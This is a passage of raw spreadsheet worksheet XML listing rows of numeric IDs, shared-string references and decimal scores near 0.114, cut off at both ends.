      </c>
      <c r="F28618" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28619" ht="15.75" customHeight="1">
      <c r="A28619" s="1">
        <v>8492.0</v>
      </c>
      <c r="B28619" s="2">
        <v>5.404336E7</v>
      </c>
      <c r="C28619" s="2" t="s">
        <v>27505</v>
      </c>
      <c r="D28619" s="2">
        <v>1.0</v>
      </c>
      <c r="E28619" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28619" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28620" ht="15.75" customHeight="1">
      <c r="A28620" s="1">
        <v>8577.0</v>
      </c>
      <c r="B28620" s="2">
        <v>5.4212289E7</v>
      </c>
      <c r="C28620" s="2" t="s">
        <v>27506</v>
      </c>
      <c r="D28620" s="2">
        <v>1.0</v>
      </c>
      <c r="E28620" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28620" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28621" ht="15.75" customHeight="1">
      <c r="A28621" s="1">
        <v>9176.0</v>
      </c>
      <c r="B28621" s="2">
        <v>5.5349923E7</v>
      </c>
      <c r="C28621" s="2" t="s">
        <v>27507</v>
      </c>
      <c r="D28621" s="2">
        <v>1.0</v>
      </c>
      <c r="E28621" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28621" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28622" ht="15.75" customHeight="1">
      <c r="A28622" s="1">
        <v>11241.0</v>
      </c>
      <c r="B28622" s="2">
        <v>2.0414753E7</v>
      </c>
      <c r="C28622" s="2" t="s">
        <v>27508</v>
      </c>
      <c r="D28622" s="2">
        <v>1.0</v>
      </c>
      <c r="E28622" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28622" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28623" ht="15.75" customHeight="1">
      <c r="A28623" s="1">
        <v>11344.0</v>
      </c>
      <c r="B28623" s="2">
        <v>2.1219859E7</v>
      </c>
      <c r="C28623" s="2" t="s">
        <v>27509</v>
      </c>
      <c r="D28623" s="2">
        <v>1.0</v>
      </c>
      <c r="E28623" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28623" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28624" ht="15.75" customHeight="1">
      <c r="A28624" s="1">
        <v>11496.0</v>
      </c>
      <c r="B28624" s="2">
        <v>2.2079113E7</v>
      </c>
      <c r="C28624" s="2" t="s">
        <v>27510</v>
      </c>
      <c r="D28624" s="2">
        <v>1.0</v>
      </c>
      <c r="E28624" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28624" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28625" ht="15.75" customHeight="1">
      <c r="A28625" s="1">
        <v>11557.0</v>
      </c>
      <c r="B28625" s="2">
        <v>2.2700772E7</v>
      </c>
      <c r="C28625" s="2" t="s">
        <v>27511</v>
      </c>
      <c r="D28625" s="2">
        <v>1.0</v>
      </c>
      <c r="E28625" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28625" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28626" ht="15.75" customHeight="1">
      <c r="A28626" s="1">
        <v>11692.0</v>
      </c>
      <c r="B28626" s="2">
        <v>2.3458481E7</v>
      </c>
      <c r="C28626" s="2" t="s">
        <v>27512</v>
      </c>
      <c r="D28626" s="2">
        <v>1.0</v>
      </c>
      <c r="E28626" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28626" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28627" ht="15.75" customHeight="1">
      <c r="A28627" s="1">
        <v>11822.0</v>
      </c>
      <c r="B28627" s="2">
        <v>2.4636152E7</v>
      </c>
      <c r="C28627" s="2" t="s">
        <v>27513</v>
      </c>
      <c r="D28627" s="2">
        <v>1.0</v>
      </c>
      <c r="E28627" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28627" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28628" ht="15.75" customHeight="1">
      <c r="A28628" s="1">
        <v>12046.0</v>
      </c>
      <c r="B28628" s="2">
        <v>2.6349997E7</v>
      </c>
      <c r="C28628" s="2" t="s">
        <v>27514</v>
      </c>
      <c r="D28628" s="2">
        <v>1.0</v>
      </c>
      <c r="E28628" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28628" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28629" ht="15.75" customHeight="1">
      <c r="A28629" s="1">
        <v>12607.0</v>
      </c>
      <c r="B28629" s="2">
        <v>3.0154197E7</v>
      </c>
      <c r="C28629" s="2" t="s">
        <v>27515</v>
      </c>
      <c r="D28629" s="2">
        <v>1.0</v>
      </c>
      <c r="E28629" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28629" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28630" ht="15.75" customHeight="1">
      <c r="A28630" s="1">
        <v>12907.0</v>
      </c>
      <c r="B28630" s="2">
        <v>3.214952E7</v>
      </c>
      <c r="C28630" s="2" t="s">
        <v>27516</v>
      </c>
      <c r="D28630" s="2">
        <v>1.0</v>
      </c>
      <c r="E28630" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28630" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28631" ht="15.75" customHeight="1">
      <c r="A28631" s="1">
        <v>13660.0</v>
      </c>
      <c r="B28631" s="2">
        <v>3.5976258E7</v>
      </c>
      <c r="C28631" s="2" t="s">
        <v>27517</v>
      </c>
      <c r="D28631" s="2">
        <v>1.0</v>
      </c>
      <c r="E28631" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28631" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28632" ht="15.75" customHeight="1">
      <c r="A28632" s="1">
        <v>14742.0</v>
      </c>
      <c r="B28632" s="2">
        <v>4.0712355E7</v>
      </c>
      <c r="C28632" s="2" t="s">
        <v>27518</v>
      </c>
      <c r="D28632" s="2">
        <v>1.0</v>
      </c>
      <c r="E28632" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28632" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28633" ht="15.75" customHeight="1">
      <c r="A28633" s="1">
        <v>15005.0</v>
      </c>
      <c r="B28633" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C28633" s="2" t="s">
        <v>27519</v>
      </c>
      <c r="D28633" s="2">
        <v>1.0</v>
      </c>
      <c r="E28633" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28633" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28634" ht="15.75" customHeight="1">
      <c r="A28634" s="1">
        <v>15135.0</v>
      </c>
      <c r="B28634" s="2">
        <v>4.1914885E7</v>
      </c>
      <c r="C28634" s="2" t="s">
        <v>27520</v>
      </c>
      <c r="D28634" s="2">
        <v>1.0</v>
      </c>
      <c r="E28634" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28634" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28635" ht="15.75" customHeight="1">
      <c r="A28635" s="1">
        <v>15406.0</v>
      </c>
      <c r="B28635" s="2">
        <v>4.283613E7</v>
      </c>
      <c r="C28635" s="2" t="s">
        <v>27521</v>
      </c>
      <c r="D28635" s="2">
        <v>1.0</v>
      </c>
      <c r="E28635" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28635" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28636" ht="15.75" customHeight="1">
      <c r="A28636" s="1">
        <v>15637.0</v>
      </c>
      <c r="B28636" s="2">
        <v>4.3583563E7</v>
      </c>
      <c r="C28636" s="2" t="s">
        <v>27522</v>
      </c>
      <c r="D28636" s="2">
        <v>1.0</v>
      </c>
      <c r="E28636" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28636" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28637" ht="15.75" customHeight="1">
      <c r="A28637" s="1">
        <v>16766.0</v>
      </c>
      <c r="B28637" s="2">
        <v>4.7647478E7</v>
      </c>
      <c r="C28637" s="2" t="s">
        <v>27523</v>
      </c>
      <c r="D28637" s="2">
        <v>1.0</v>
      </c>
      <c r="E28637" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28637" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28638" ht="15.75" customHeight="1">
      <c r="A28638" s="1">
        <v>17655.0</v>
      </c>
      <c r="B28638" s="2">
        <v>5.0439768E7</v>
      </c>
      <c r="C28638" s="2" t="s">
        <v>27524</v>
      </c>
      <c r="D28638" s="2">
        <v>1.0</v>
      </c>
      <c r="E28638" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28638" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28639" ht="15.75" customHeight="1">
      <c r="A28639" s="1">
        <v>17978.0</v>
      </c>
      <c r="B28639" s="2">
        <v>5.1368159E7</v>
      </c>
      <c r="C28639" s="2" t="s">
        <v>27525</v>
      </c>
      <c r="D28639" s="2">
        <v>1.0</v>
      </c>
      <c r="E28639" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28639" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28640" ht="15.75" customHeight="1">
      <c r="A28640" s="1">
        <v>18370.0</v>
      </c>
      <c r="B28640" s="2">
        <v>5.2571668E7</v>
      </c>
      <c r="C28640" s="2" t="s">
        <v>27526</v>
      </c>
      <c r="D28640" s="2">
        <v>1.0</v>
      </c>
      <c r="E28640" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28640" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28641" ht="15.75" customHeight="1">
      <c r="A28641" s="1">
        <v>18801.0</v>
      </c>
      <c r="B28641" s="2">
        <v>5.3863794E7</v>
      </c>
      <c r="C28641" s="2" t="s">
        <v>27527</v>
      </c>
      <c r="D28641" s="2">
        <v>1.0</v>
      </c>
      <c r="E28641" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28641" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28642" ht="15.75" customHeight="1">
      <c r="A28642" s="1">
        <v>19282.0</v>
      </c>
      <c r="B28642" s="2">
        <v>5.5165907E7</v>
      </c>
      <c r="C28642" s="2" t="s">
        <v>27528</v>
      </c>
      <c r="D28642" s="2">
        <v>1.0</v>
      </c>
      <c r="E28642" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28642" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28643" ht="15.75" customHeight="1">
      <c r="A28643" s="1">
        <v>19725.0</v>
      </c>
      <c r="B28643" s="2">
        <v>5.6612684E7</v>
      </c>
      <c r="C28643" s="2" t="s">
        <v>27529</v>
      </c>
      <c r="D28643" s="2">
        <v>1.0</v>
      </c>
      <c r="E28643" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28643" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28644" ht="15.75" customHeight="1">
      <c r="A28644" s="1">
        <v>19943.0</v>
      </c>
      <c r="B28644" s="2">
        <v>5.7458747E7</v>
      </c>
      <c r="C28644" s="2" t="s">
        <v>27530</v>
      </c>
      <c r="D28644" s="2">
        <v>1.0</v>
      </c>
      <c r="E28644" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28644" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28645" ht="15.75" customHeight="1">
      <c r="A28645" s="1">
        <v>20091.0</v>
      </c>
      <c r="B28645" s="2">
        <v>949914.0</v>
      </c>
      <c r="C28645" s="2" t="s">
        <v>27531</v>
      </c>
      <c r="D28645" s="2">
        <v>1.0</v>
      </c>
      <c r="E28645" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28645" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28646" ht="15.75" customHeight="1">
      <c r="A28646" s="1">
        <v>20149.0</v>
      </c>
      <c r="B28646" s="2">
        <v>1.0204209E7</v>
      </c>
      <c r="C28646" s="2" t="s">
        <v>27532</v>
      </c>
      <c r="D28646" s="2">
        <v>1.0</v>
      </c>
      <c r="E28646" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28646" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28647" ht="15.75" customHeight="1">
      <c r="A28647" s="1">
        <v>21141.0</v>
      </c>
      <c r="B28647" s="2">
        <v>1.8566945E7</v>
      </c>
      <c r="C28647" s="2" t="s">
        <v>27533</v>
      </c>
      <c r="D28647" s="2">
        <v>1.0</v>
      </c>
      <c r="E28647" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28647" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28648" ht="15.75" customHeight="1">
      <c r="A28648" s="1">
        <v>23204.0</v>
      </c>
      <c r="B28648" s="2">
        <v>5253712.0</v>
      </c>
      <c r="C28648" s="2" t="s">
        <v>27534</v>
      </c>
      <c r="D28648" s="2">
        <v>1.0</v>
      </c>
      <c r="E28648" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28648" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28649" ht="15.75" customHeight="1">
      <c r="A28649" s="1">
        <v>23585.0</v>
      </c>
      <c r="B28649" s="2">
        <v>6279425.0</v>
      </c>
      <c r="C28649" s="2" t="s">
        <v>27535</v>
      </c>
      <c r="D28649" s="2">
        <v>1.0</v>
      </c>
      <c r="E28649" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28649" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28650" ht="15.75" customHeight="1">
      <c r="A28650" s="1">
        <v>23645.0</v>
      </c>
      <c r="B28650" s="2">
        <v>6714582.0</v>
      </c>
      <c r="C28650" s="2" t="s">
        <v>27536</v>
      </c>
      <c r="D28650" s="2">
        <v>1.0</v>
      </c>
      <c r="E28650" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28650" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28651" ht="15.75" customHeight="1">
      <c r="A28651" s="1">
        <v>24272.0</v>
      </c>
      <c r="B28651" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C28651" s="2" t="s">
        <v>27537</v>
      </c>
      <c r="D28651" s="2">
        <v>1.0</v>
      </c>
      <c r="E28651" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28651" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28652" ht="15.75" customHeight="1">
      <c r="A28652" s="1">
        <v>24367.0</v>
      </c>
      <c r="B28652" s="2">
        <v>1.0742088E7</v>
      </c>
      <c r="C28652" s="2" t="s">
        <v>27538</v>
      </c>
      <c r="D28652" s="2">
        <v>1.0</v>
      </c>
      <c r="E28652" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28652" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28653" ht="15.75" customHeight="1">
      <c r="A28653" s="1">
        <v>24786.0</v>
      </c>
      <c r="B28653" s="2">
        <v>1.1962446E7</v>
      </c>
      <c r="C28653" s="2" t="s">
        <v>27539</v>
      </c>
      <c r="D28653" s="2">
        <v>1.0</v>
      </c>
      <c r="E28653" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28653" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28654" ht="15.75" customHeight="1">
      <c r="A28654" s="1">
        <v>25894.0</v>
      </c>
      <c r="B28654" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C28654" s="2" t="s">
        <v>27540</v>
      </c>
      <c r="D28654" s="2">
        <v>1.0</v>
      </c>
      <c r="E28654" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28654" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28655" ht="15.75" customHeight="1">
      <c r="A28655" s="1">
        <v>27822.0</v>
      </c>
      <c r="B28655" s="2">
        <v>2.3382534E7</v>
      </c>
      <c r="C28655" s="2" t="s">
        <v>27541</v>
      </c>
      <c r="D28655" s="2">
        <v>1.0</v>
      </c>
      <c r="E28655" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28655" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28656" ht="15.75" customHeight="1">
      <c r="A28656" s="1">
        <v>27883.0</v>
      </c>
      <c r="B28656" s="2">
        <v>2.3575742E7</v>
      </c>
      <c r="C28656" s="2" t="s">
        <v>27542</v>
      </c>
      <c r="D28656" s="2">
        <v>1.0</v>
      </c>
      <c r="E28656" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28656" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28657" ht="15.75" customHeight="1">
      <c r="A28657" s="1">
        <v>28457.0</v>
      </c>
      <c r="B28657" s="2">
        <v>2.6606441E7</v>
      </c>
      <c r="C28657" s="2" t="s">
        <v>27543</v>
      </c>
      <c r="D28657" s="2">
        <v>1.0</v>
      </c>
      <c r="E28657" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28657" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28658" ht="15.75" customHeight="1">
      <c r="A28658" s="1">
        <v>28466.0</v>
      </c>
      <c r="B28658" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C28658" s="2" t="s">
        <v>27544</v>
      </c>
      <c r="D28658" s="2">
        <v>1.0</v>
      </c>
      <c r="E28658" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28658" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28659" ht="15.75" customHeight="1">
      <c r="A28659" s="1">
        <v>28948.0</v>
      </c>
      <c r="B28659" s="2">
        <v>2.9717736E7</v>
      </c>
      <c r="C28659" s="2" t="s">
        <v>27545</v>
      </c>
      <c r="D28659" s="2">
        <v>1.0</v>
      </c>
      <c r="E28659" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28659" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28660" ht="15.75" customHeight="1">
      <c r="A28660" s="1">
        <v>29672.0</v>
      </c>
      <c r="B28660" s="2">
        <v>3.3981263E7</v>
      </c>
      <c r="C28660" s="2" t="s">
        <v>27546</v>
      </c>
      <c r="D28660" s="2">
        <v>1.0</v>
      </c>
      <c r="E28660" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28660" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28661" ht="15.75" customHeight="1">
      <c r="A28661" s="1">
        <v>29837.0</v>
      </c>
      <c r="B28661" s="2">
        <v>3.5540752E7</v>
      </c>
      <c r="C28661" s="2" t="s">
        <v>27547</v>
      </c>
      <c r="D28661" s="2">
        <v>1.0</v>
      </c>
      <c r="E28661" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28661" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28662" ht="15.75" customHeight="1">
      <c r="A28662" s="1">
        <v>30552.0</v>
      </c>
      <c r="B28662" s="2">
        <v>4.0646435E7</v>
      </c>
      <c r="C28662" s="2" t="s">
        <v>27548</v>
      </c>
      <c r="D28662" s="2">
        <v>1.0</v>
      </c>
      <c r="E28662" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28662" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28663" ht="15.75" customHeight="1">
      <c r="A28663" s="1">
        <v>30697.0</v>
      </c>
      <c r="B28663" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C28663" s="2" t="s">
        <v>27549</v>
      </c>
      <c r="D28663" s="2">
        <v>1.0</v>
      </c>
      <c r="E28663" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28663" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28664" ht="15.75" customHeight="1">
      <c r="A28664" s="1">
        <v>30953.0</v>
      </c>
      <c r="B28664" s="2">
        <v>4.7371959E7</v>
      </c>
      <c r="C28664" s="2" t="s">
        <v>27550</v>
      </c>
      <c r="D28664" s="2">
        <v>1.0</v>
      </c>
      <c r="E28664" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28664" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28665" ht="15.75" customHeight="1">
      <c r="A28665" s="1">
        <v>31314.0</v>
      </c>
      <c r="B28665" s="2">
        <v>4.9700089E7</v>
      </c>
      <c r="C28665" s="2" t="s">
        <v>27551</v>
      </c>
      <c r="D28665" s="2">
        <v>1.0</v>
      </c>
      <c r="E28665" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28665" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28666" ht="15.75" customHeight="1">
      <c r="A28666" s="1">
        <v>31573.0</v>
      </c>
      <c r="B28666" s="2">
        <v>5124515.0</v>
      </c>
      <c r="C28666" s="2" t="s">
        <v>27552</v>
      </c>
      <c r="D28666" s="2">
        <v>1.0</v>
      </c>
      <c r="E28666" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28666" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28667" ht="15.75" customHeight="1">
      <c r="A28667" s="1">
        <v>31900.0</v>
      </c>
      <c r="B28667" s="2">
        <v>5.2955382E7</v>
      </c>
      <c r="C28667" s="2" t="s">
        <v>27553</v>
      </c>
      <c r="D28667" s="2">
        <v>1.0</v>
      </c>
      <c r="E28667" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28667" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28668" ht="15.75" customHeight="1">
      <c r="A28668" s="1">
        <v>33093.0</v>
      </c>
      <c r="B28668" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C28668" s="2" t="s">
        <v>27554</v>
      </c>
      <c r="D28668" s="2">
        <v>1.0</v>
      </c>
      <c r="E28668" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28668" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28669" ht="15.75" customHeight="1">
      <c r="A28669" s="1">
        <v>33386.0</v>
      </c>
      <c r="B28669" s="2">
        <v>7652284.0</v>
      </c>
      <c r="C28669" s="2" t="s">
        <v>27555</v>
      </c>
      <c r="D28669" s="2">
        <v>1.0</v>
      </c>
      <c r="E28669" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28669" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28670" ht="15.75" customHeight="1">
      <c r="A28670" s="1">
        <v>33421.0</v>
      </c>
      <c r="B28670" s="2">
        <v>7759600.0</v>
      </c>
      <c r="C28670" s="2" t="s">
        <v>27556</v>
      </c>
      <c r="D28670" s="2">
        <v>1.0</v>
      </c>
      <c r="E28670" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28670" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28671" ht="15.75" customHeight="1">
      <c r="A28671" s="1">
        <v>964.0</v>
      </c>
      <c r="B28671" s="2">
        <v>2.2711723E7</v>
      </c>
      <c r="C28671" s="2" t="s">
        <v>27557</v>
      </c>
      <c r="D28671" s="2">
        <v>1.0</v>
      </c>
      <c r="E28671" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28671" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28672" ht="15.75" customHeight="1">
      <c r="A28672" s="1">
        <v>2855.0</v>
      </c>
      <c r="B28672" s="2">
        <v>3.5511566E7</v>
      </c>
      <c r="C28672" s="2" t="s">
        <v>27558</v>
      </c>
      <c r="D28672" s="2">
        <v>1.0</v>
      </c>
      <c r="E28672" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28672" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28673" ht="15.75" customHeight="1">
      <c r="A28673" s="1">
        <v>6592.0</v>
      </c>
      <c r="B28673" s="2">
        <v>4.8978375E7</v>
      </c>
      <c r="C28673" s="2" t="s">
        <v>27559</v>
      </c>
      <c r="D28673" s="2">
        <v>1.0</v>
      </c>
      <c r="E28673" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28673" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28674" ht="15.75" customHeight="1">
      <c r="A28674" s="1">
        <v>10886.0</v>
      </c>
      <c r="B28674" s="2">
        <v>1.6530372E7</v>
      </c>
      <c r="C28674" s="2" t="s">
        <v>27560</v>
      </c>
      <c r="D28674" s="2">
        <v>1.0</v>
      </c>
      <c r="E28674" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28674" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28675" ht="15.75" customHeight="1">
      <c r="A28675" s="1">
        <v>15764.0</v>
      </c>
      <c r="B28675" s="2">
        <v>4.4172142E7</v>
      </c>
      <c r="C28675" s="2" t="s">
        <v>27561</v>
      </c>
      <c r="D28675" s="2">
        <v>1.0</v>
      </c>
      <c r="E28675" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28675" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28676" ht="15.75" customHeight="1">
      <c r="A28676" s="1">
        <v>16631.0</v>
      </c>
      <c r="B28676" s="2">
        <v>4.7099203E7</v>
      </c>
      <c r="C28676" s="2" t="s">
        <v>27562</v>
      </c>
      <c r="D28676" s="2">
        <v>1.0</v>
      </c>
      <c r="E28676" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28676" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28677" ht="15.75" customHeight="1">
      <c r="A28677" s="1">
        <v>21794.0</v>
      </c>
      <c r="B28677" s="2">
        <v>2.6615477E7</v>
      </c>
      <c r="C28677" s="2" t="s">
        <v>27563</v>
      </c>
      <c r="D28677" s="2">
        <v>1.0</v>
      </c>
      <c r="E28677" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28677" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28678" ht="15.75" customHeight="1">
      <c r="A28678" s="1">
        <v>33021.0</v>
      </c>
      <c r="B28678" s="2">
        <v>6669403.0</v>
      </c>
      <c r="C28678" s="2" t="s">
        <v>27564</v>
      </c>
      <c r="D28678" s="2">
        <v>1.0</v>
      </c>
      <c r="E28678" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28678" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="28679" ht="15.75" customHeight="1">
      <c r="A28679" s="1">
        <v>1681.0</v>
      </c>
      <c r="B28679" s="2">
        <v>2.8391047E7</v>
      </c>
      <c r="C28679" s="2" t="s">
        <v>27565</v>
      </c>
      <c r="D28679" s="2">
        <v>1.0</v>
      </c>
      <c r="E28679" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28679" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28680" ht="15.75" customHeight="1">
      <c r="A28680" s="1">
        <v>8950.0</v>
      </c>
      <c r="B28680" s="2">
        <v>5.4922945E7</v>
      </c>
      <c r="C28680" s="2" t="s">
        <v>27566</v>
      </c>
      <c r="D28680" s="2">
        <v>1.0</v>
      </c>
      <c r="E28680" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28680" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28681" ht="15.75" customHeight="1">
      <c r="A28681" s="1">
        <v>12389.0</v>
      </c>
      <c r="B28681" s="2">
        <v>2.8866273E7</v>
      </c>
      <c r="C28681" s="2" t="s">
        <v>27567</v>
      </c>
      <c r="D28681" s="2">
        <v>1.0</v>
      </c>
      <c r="E28681" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28681" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28682" ht="15.75" customHeight="1">
      <c r="A28682" s="1">
        <v>16564.0</v>
      </c>
      <c r="B28682" s="2">
        <v>4.6866255E7</v>
      </c>
      <c r="C28682" s="2" t="s">
        <v>27568</v>
      </c>
      <c r="D28682" s="2">
        <v>1.0</v>
      </c>
      <c r="E28682" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28682" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28683" ht="15.75" customHeight="1">
      <c r="A28683" s="1">
        <v>17750.0</v>
      </c>
      <c r="B28683" s="2">
        <v>5.068286E7</v>
      </c>
      <c r="C28683" s="2" t="s">
        <v>27569</v>
      </c>
      <c r="D28683" s="2">
        <v>1.0</v>
      </c>
      <c r="E28683" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28683" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28684" ht="15.75" customHeight="1">
      <c r="A28684" s="1">
        <v>24136.0</v>
      </c>
      <c r="B28684" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C28684" s="2" t="s">
        <v>27570</v>
      </c>
      <c r="D28684" s="2">
        <v>1.0</v>
      </c>
      <c r="E28684" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28684" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28685" ht="15.75" customHeight="1">
      <c r="A28685" s="1">
        <v>29164.0</v>
      </c>
      <c r="B28685" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C28685" s="2" t="s">
        <v>27571</v>
      </c>
      <c r="D28685" s="2">
        <v>1.0</v>
      </c>
      <c r="E28685" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28685" s="2">
